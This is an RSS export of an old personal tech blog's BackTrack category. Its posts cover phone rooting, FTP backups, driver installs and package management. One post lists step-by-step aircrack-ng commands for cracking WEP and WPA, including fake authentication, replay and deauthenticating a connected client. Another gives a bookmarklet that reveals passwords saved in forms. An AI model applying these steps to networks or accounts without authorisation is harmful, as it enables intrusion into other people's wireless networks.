<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HydTech &#187; BackTrack</title>
	<atom:link href="http://hydtechblog.com/category/backtrack/feed/" rel="self" type="application/rss+xml" />
	<link>http://hydtechblog.com</link>
	<description>anotha hyd anotha day</description>
	<lastBuildDate>Sat, 24 Jul 2010 14:33:39 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Getting root on your new Nexus One Android Google Phone</title>
		<link>http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/</link>
		<comments>http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/#comments</comments>
		<pubDate>Tue, 05 Jan 2010 23:29:09 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Android]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[OSX]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=638</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/&amp;title='Getting+root+on+your+new+Nexus+One+Android+Google+Phone'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>The Nexus one was rooted before it even got released.  Paul at modaco forums showed us how to perform this hack.  I&#8217;ll try to simplify the method here.</p>
<p>1. First unlock your bootloader if you have a T-mobile Nexus One (this voids the warranty) or get an unlocked version from Google for like $550:</p>
<p>a. <a href="http://hydtechblog.com/filez/fastboot.zip">download fastboot</a><br />
b. open terminal or command line and type<br />
 &#8211; Windows <code>fastboot-windows oem unlock</code><br />
 &#8211; Mac <code>./fastboot-mac oem unlock</code><br />
 &#8211; Linux <code>./fastboot-linux oem unlock</code></p>
<p>2. Rewrite the Bootloader to obtain root privileges:</p>
<p>a. Download either <a href="http://hydtechblog.com/filez/1.1-nexusone-superboot.zip">SuperBoot</a> or  <a href="http://hydtechblog.com/filez/1.1-nexusone-insecure.zip">InsecureBoot</a> and extract. (The difference is that with the insecure boot you won&#8217;t make any changes to the system and you would have to launch su manually)<br />
b. Put the device in bootloader mode:<br />
 &#8211; Turn off the phone and restart holding the trackball.<br />
c. Flash the bootloader:<br />
 &#8211; Windows = double click the windows bat file<br />
 &#8211; Mac = open terminal and cd to the directory containing the file.  type <br /><code>chmod +x install-superboot-mac.sh<br />
./install-superboot-mac.sh</code><br />
 &#8211; Linux = open terminal and cd to the directory containing the file.  type <br /><code>chmod +x install-superboot-linux.sh<br />
./install-superboot-linux.sh</code></p>
<p>Now you should have root!</p>
<p><img src="http://content.modaco.net/imagewell/rootednexusone.jpg" alt="Rooted Nexus One Google Phone" /><br />
Pic courtesy of Stericson.</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=638&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Automatic website backup without SSH enabled over FTP</title>
		<link>http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/</link>
		<comments>http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/#comments</comments>
		<pubDate>Thu, 03 Dec 2009 22:34:42 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Lenovo S10]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[OSX]]></category>
		<category><![CDATA[Webhosting]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=597</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/&amp;title='Automatic+website+backup+without+SSH+enabled+over+FTP'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>Last time I backed up my website with rsync and ssh, but on my new host they disabled SSH.  Rsync does not work over ftp.  I do not want to do incremental backups with delta files like is done with rdiff-backup or duplicity. I need to have an exact mirror of my site.  But remember that your sql databases won&#8217;t be backed up.</p>
<p>Curlftpfs is the key! In this tutorial I will show you how to backup from one server to a backup location which can be your hard drive, another web host, dropbox folder, Box.net via webdav, etc.</p>
<p>Download curlftpfs, rsync and ncftp:<br />
<code>sudo apt-get install curlftpfs ncftp rsync</code></p>
<p>make directories to mount your ftp server:<br />
<code>sudo mkdir /media/hydtechblog</code><br />
<code>sudo mkdir /media/hydtechbackupserver</code></p>
<p>edit fstab to mount the ftp servers using curlftpfs:<br />
<code>sudo gedit /etc/fstab</code></p>
<p>add the lines and modify them according to your server:<br />
curlftpfs#username:password@hydtechblog.com /media/hydtechblog fuse rw,allow_other,uid=root 0 0<br />
curlftpfs#username:password@hydtechbackupserver /media/hydtechbackupserver fuse rw,allow_other,uid=root 0 0</p>
<p>One thing to remember is that these two will not mount automatically because when the computer restarts, the fstab is done while you are not connected to the network.  To fix this we can just add the mount commands in our crontab.</p>
<p>Edit crontab:<br />
<code>sudo crontab -e</code><br />
enter the following lines and modify accordingly:<br />
00 09 * * * mount /media/hydtechblog<br />
00 09 * * * mount /media/hydtechbackup<br />
01 09 * * * rsync -avz &#8211;rsync-path=/usr/bin/rsync /media/hydtechblog/public_html /media/hydtechbackup/public_html</p>
<p>ctrl + o to write and ctrl + x to save</p>
<p>This will tell cron to mount the folders at 9:00 am and start rsync at 9:01 am.  You can replace the backup location to another folder on your hard drive or your dropbox or ubuntu one folder.  You can also mount box.net with webdav and use this method.</p>
<p>For encrypted incremental backups checkout duplicity, it also works with webdav and ftp.</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=597&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Revealing Opera wand passwords on Ubuntu Linux and OS X</title>
		<link>http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/</link>
		<comments>http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/#comments</comments>
		<pubDate>Mon, 23 Nov 2009 20:28:09 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=586</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/&amp;title='Revealing+Opera+wand+passwords+on+Ubuntu+Linux+and+OS+X'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>There are several utilities in Windows which reveal the opera wand password and I haven&#8217;t used windows in forever.  The Opera wiki has a Power button which can help capture your password while logging in to the site. <a class="button" title="Click this link in Opera" href="opera:/button/Wand &amp; Go to page, &quot;javascript:(function(){var s,F,j,f,i; s=%27%27; F=document.forms; for(j=0; j&lt;F.length; ++j){f=F[j]; for(i=0; i&lt;f.length; ++i){if(f[i].type &amp;&amp; f[i].type.toLowerCase()==%27password%27)s+=f[i].value+%27%5cn%27;}}if(s)alert(%27Passwords in forms on this page:%5cn%5cn%27+s);else alert(%27There are no passwords in forms on this page.%27);})();&quot;,1,,&quot;Wand&quot;">Click this link in Opera</a> and it will install a button which you can drag to any panel.  While on a page which requires a password, you can click on this new wand instead of your original wand.</p>
<p>Voila!</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=586&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10</title>
		<link>http://hydtechblog.com/2009/09/25/how-to-make-the-broadcom-4312-wireless-driver-work-on-the-lenovo-s10/</link>
		<comments>http://hydtechblog.com/2009/09/25/how-to-make-the-broadcom-4312-wireless-driver-work-on-the-lenovo-s10/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 18:10:19 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Lenovo S10]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[b43]]></category>
		<category><![CDATA[b43legacy]]></category>
		<category><![CDATA[backtrack 4]]></category>
		<category><![CDATA[bc43xx]]></category>
		<category><![CDATA[broadcom]]></category>
		<category><![CDATA[BT4]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=485</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/09/25/how-to-make-the-broadcom-4312-wireless-driver-work-on-the-lenovo-s10/&amp;title='How+to+make+the+Broadcom+4312+Wireless+driver+work+in+BackTrack+4+on+the+Lenovo+S10'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/09/25/how-to-make-the-broadcom-4312-wireless-driver-work-on-the-lenovo-s10/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>This guide is adapted from Kazalku&#8217;s guide on remote exploit forums.  Thanks Kazalku.</p>
<p>Download this driver and transfer it with a USB or boot up into another OS on your multiboot and save it in the BT root folder from <a href="http://www.broadcom.com/support/802.11/linux_sta.php">here</a>.</p>
<p>Untar it:<br />
<code><br />
tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz</code></p>
<p>makefile:<br />
<code>make -C /lib/modules/`uname -r`/build M=`pwd`</code></p>
<p>Insert the modules:<br />
<code>modprobe ieee80211_crypt_tkip<br />
insmod wl.ko</code></p>
<p>Now you should have the network Claimed.  you can check by:<br />
<code>lshw -C network</code></p>
<p>Bring it up:<br />
<code>ifconfig eth1 up</code></p>
<p>To load the module upon boot:<br />
<code><br />
cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless<br />
depmod -a<br />
modprobe wl</code></p>
<p>Load the module at every startup:<br />
<code>kate /etc/modules</code></p>
<p>add the following and close the text editor:<br />
    ieee80211_crypt_tkip<br />
    wl</p>
<p>Load NetworkManager and Configure KnetworkManager:<br />
Type <code>NetworkManager</code> in a konsole and configure the wireless at the bottom right.</p>
<p>Delete the files you created in the root folder now that you dont need them.</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=485&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/09/25/how-to-make-the-broadcom-4312-wireless-driver-work-on-the-lenovo-s10/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Cracking WEP &amp; WPA with IBM Lenovo X60 &#8211; Basics</title>
		<link>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/</link>
		<comments>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 05:43:21 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[lenovo]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[wpa]]></category>
		<category><![CDATA[x60]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=460</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/&amp;title='Cracking+WEP+%26amp%3B+WPA+with+IBM+Lenovo+X60+-+Basics'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>At first injection with the Intel pro wireless cards was impossible.  Then came the ipwraw driver.  Now, we no longer need the ipwraw as the iwl3945 card supports injection<a href="http://hydtechblog.com">.</a>  Most linux distros now ship with this driver.</p>
<p>Follow these steps for a succesful WEP crack in Ubuntu:</p>
<p>download necessary files<br />
sudo apt-get install aircrack-ng</p>
<p>place card in monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>test injection<br />
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80  mon0<br />
(0% means injection not working)</p>
<p>capture data and write to file called output<br />
 sudo airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w output mon0</p>
<p>fake authentication<br />
 sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>replay mode<br />
 sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>run aircrack<br />
sudo  aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap</p>
<p>For WPA cracking follow this:</p>
<p>monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>collect handshake<br />
sudo  airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w psk mon0</p>
<p>deauth connected client<br />
sudo  aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0</p>
<p>cracking<br />
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap</p>
<p>These are just refreshers. For more help check www.aircrack-ng.org</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=460&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Freenx nx server problem in Ubuntu Jaunty 9.04</title>
		<link>http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/</link>
		<comments>http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/#comments</comments>
		<pubDate>Wed, 01 Jul 2009 20:52:27 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=385</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/&amp;title='Freenx+nx+server+problem+in+Ubuntu+Jaunty+9.04'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>After upgrading to Jaunty, I never managed to successfully connect to my desktop using NX.  I use a windows computer with nomachine nx client. I always got an error like this:<br />
<code><br />
Info: Proxy running in client mode with pid '1728'<br />
Session: Starting session at 'Sat Jan 12 16:34:05 2008'.<br />
Warning: Connected to remote version 3.0.0 with local version 3.1.0<br />
Info: Connection with remote proxy completed.<br />
Warning: Unrecognized session type 'unix-desktop'. Assuming agent session.<br />
Info: Using ADSL link parameters 512/24/1/0.<br />
Info: Using cache parameters 4/4096KB/16384KB/16384KB.<br />
Info: Using pack method 'adaptive-7' with session 'unix-gnome'.<br />
Info: Using ZLIB data compression 1/1/32.<br />
Info: Using ZLIB stream compression 4/4.<br />
Info: No suitable cache file found.<br />
Info: Forwarding X11 connections to display ':0'.<br />
Info: Forwarding multimedia connections to port '6000'.<br />
Info: Listening to font server connections on port '11000'.<br />
Session: Session started at 'Sat Jan 12 16:58:19 2008'.<br />
Info: Established X server connection.<br />
Info: Using shared memory parameters 0/0K.<br />
Session: Terminating session at 'Sat Jan 12 16:58:19 2008'.<br />
Session: Session terminated at 'Sat Jan 12 16:58:19 2008'.</code></p>
<p>After hours of searching the web, I concluded the problem is with the ownership and permissions of the .Xauthority file.  Here&#8217;s how I fixed it:<br />
<code>sudo chown hydtech /home/hydtech/.Xauthority<br />
sudo chgrp hydtech /home/hydtech/.Xauthority</code></p>
<p>and delete:<br />
<code>sudo rm /home/hydtech/.Xauthority-l<br />
sudo rm /home/hydtech/.Xauthority-c</code></p>
<p>Now it works like a c<a href="http://hydtechblog.com">h</a>arm.</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=385&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>How to Install packages with slapt-get or gslapt in BackTrack 3</title>
		<link>http://hydtechblog.com/2009/04/21/how-to-install-packages-with-slapt-get-or-gslapt-in-backtrack-3/</link>
		<comments>http://hydtechblog.com/2009/04/21/how-to-install-packages-with-slapt-get-or-gslapt-in-backtrack-3/#comments</comments>
		<pubDate>Tue, 21 Apr 2009 03:49:15 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=335</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/04/21/how-to-install-packages-with-slapt-get-or-gslapt-in-backtrack-3/&amp;title='How+to+Install+packages+with+slapt-get+or+gslapt+in+BackTrack+3'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/04/21/how-to-install-packages-with-slapt-get-or-gslapt-in-backtrack-3/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>Once BackTrack is installed on the harddrive, open the menu and goto K -&gt; BackTrack -&gt; Penetration -&gt; Fast Track<br />
type:<br />
<code> ./fast-track.py -i </code><br />
<img src="http://hydtech.files.wordpress.com/2009/04/snapshot.png" alt="snapshot" title="snapshot" width="510" height="382" class="aligncenter size-full wp-image-337" /><br />
Enter the Fast-Track updates menu (1).<br />
Update everything <a href="http://hydtechblog.com/2009/04/02/how-to-report-ubuntu-bugs-at-launchpad-and-find-and-install-latest-deb/">(</a>9).<br />
<img src="http://hydtech.files.wordpress.com/2009/04/snapshot1.png" alt="snapshot1" title="snapshot1" width="510" height="382" class="aligncenter size-full wp-image-338" /></p>
<p>After the update finishes, select the Installation menu (8).<br />
Install everything (8).<br />
Go back to the Installation menu, select Install Slapt-Get (1)<br />
Install Slapt-Get (2), then select update SlackWare (1).<br />
Exit (10)</p>
<p>Now, you can use slapt-get to install packages from the slackware repositories.  For example, if you want to install mozilla-thunderbird:<br />
Make sure it exists in the repositories:<br />
<code>slapt-get --search thunderbird</code><br />
if you find it, use the install parameter to install:<br />
<code>slapt-get --install mozilla-thunderbird-2.0.0.21-i686-1<br />
</code><br />
<img src="http://hydtech.files.wordpress.com/2009/04/snapshot2.png" alt="snapshot2" title="snapshot2" width="510" height="382" class="aligncenter size-full wp-image-340" /></p>
<p>you can also use the gui front-end for slapt-get, but it is broken by default in BT3.  so let&#8217;s reinstall it:<br />
<code>slapt-get --install --reinstall gslapt</code></p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=335&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/04/21/how-to-install-packages-with-slapt-get-or-gslapt-in-backtrack-3/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>
